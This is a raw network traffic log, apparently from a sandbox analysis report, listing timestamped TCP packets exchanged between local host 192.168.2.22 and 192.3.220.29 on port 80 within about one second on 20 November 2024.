                                                                                                            Nov 20, 2024 16:57:27.144675016 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.145045996 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.145117044 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.152971029 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.153043032 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.153477907 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.153542042 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.161382914 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.161485910 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.161648989 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.161709070 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.169784069 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.169855118 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.169924974 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.169965982 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.178100109 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.178195953 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.178225994 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.178287029 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.186384916 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.186455965 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.186984062 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.187026978 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.224056959 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.224133015 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.311445951 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.311592102 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.311618090 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.311757088 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.314465046 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.314537048 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.314631939 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.314682007 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.320385933 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.320449114 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.320930958 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.320980072 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.326500893 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.326550007 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.326601982 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.326644897 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.332575083 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.332663059 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.332860947 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.332904100 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.338371038 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.338445902 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.339168072 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.339216948 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.344364882 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.344414949 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.344532967 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.344568014 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.350444078 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.350501060 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.351191044 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.351241112 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.356858015 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.356911898 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.357228994 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.357280970 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.360301971 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.360358953 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.360486031 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.360527039 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.364238977 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.364300966 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.364347935 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.364386082 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.368187904 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.368258953 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.368509054 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.368552923 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.372086048 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.372169018 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.372468948 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.372509956 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.376022100 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.376077890 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.376394033 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.376441002 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.379935980 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.380000114 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.380765915 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.380909920 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.383939028 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.384021044 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.384149075 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.384190083 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.388550997 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.388612986 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.388880968 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.388920069 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.392689943 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.392741919 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.393117905 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.393168926 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.396063089 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.396120071 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.396241903 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.396281958 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.399501085 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.399552107 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.399801970 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.399918079 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.403829098 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.403871059 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.403964043 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.404004097 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.407530069 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.407613993 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.525437117 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.525489092 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.525532961 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.525573015 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.526922941 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.526978016 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.527107954 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.527169943 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.530555010 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.530638933 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.530720949 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.530765057 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.532048941 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.532085896 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.532114983 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.532143116 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.534039021 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.534105062 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.534362078 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.534463882 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.537352085 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.537422895 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.537497997 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.537544012 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.540779114 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.540883064 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.540986061 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.541038036 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.544245958 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.544312000 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.544389963 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.544439077 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.547696114 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.547775030 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.547919989 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.548072100 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.551175117 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.551246881 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.551795006 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.551964998 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.554564953 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.554647923 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.554802895 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.554879904 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.558161020 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.558229923 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.558326960 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.558378935 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.561436892 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.561507940 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.561589956 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.561645031 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.565185070 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.565239906 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.565258026 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.565289974 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.568274021 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.568339109 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.568413019 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.568470955 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.571773052 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.571835041 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.571845055 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.571898937 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.575181007 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.575253010 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.575465918 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.575520039 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.578650951 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.578718901 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.578823090 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.578876019 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.582061052 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.582129002 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.582227945 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.582278967 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.585477114 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.585540056 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.585630894 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.585675955 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.589029074 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.589093924 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.589148045 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.589195013 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.592415094 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.592474937 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.592741013 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.592839956 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.595731020 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.595793962 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.596354961 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.596405029 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.599246979 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.599304914 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.599497080 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.599632025 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.602778912 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.602885008 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.602890015 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.602940083 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.607037067 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.607106924 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.607156992 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.607211113 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.650863886 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.650979042 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.651072025 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.651124954 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.652796984 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.652858973 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.652925014 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.652971029 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.656241894 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.656322002 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.656538963 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.656625986 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.659569025 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.659604073 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.659638882 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.659638882 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.662894964 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.662928104 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.662960052 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.662960052 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.666331053 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.666379929 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.666402102 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.666413069 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.669833899 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.670152903 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.670290947 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.670290947 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.673196077 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.673247099 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.673310995 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.673352957 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.676572084 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.676625013 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.676747084 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.676784992 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.680134058 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.680186033 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.732561111 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.732580900 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.732642889 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.733788967 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.733841896 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.734077930 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.734123945 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.736502886 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.736641884 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.736684084 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.736737013 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.739197969 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.739279032 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.739372015 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.739427090 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.741946936 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.742018938 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.742022991 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.742065907 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.744635105 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.744704008 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.744815111 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.744868994 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.747271061 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.747334003 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.748378038 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.748435020 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.749881983 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.749941111 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.750015020 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.750066042 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.752554893 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.752624035 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.752688885 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.752746105 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.755228043 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.755296946 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.755337954 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.755387068 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.759716988 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.759788990 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.764108896 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.764156103 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.764194965 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.764202118 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.764202118 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.764238119 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.766658068 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.766732931 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.767194986 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.767250061 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.768906116 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.768980026 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.769428015 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.769490004 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.771457911 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.771528959 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.772258043 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.772324085 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.774976969 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.775048971 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.775511026 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.775566101 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.777478933 CET8049166192.3.220.29192.168.2.22
                                                                                                            Nov 20, 2024 16:57:27.777559042 CET4916680192.168.2.22192.3.220.29
                                                                                                            Nov 20, 2024 16:57:27.778146982 CET8049166192.3.220.29192.168.2.22
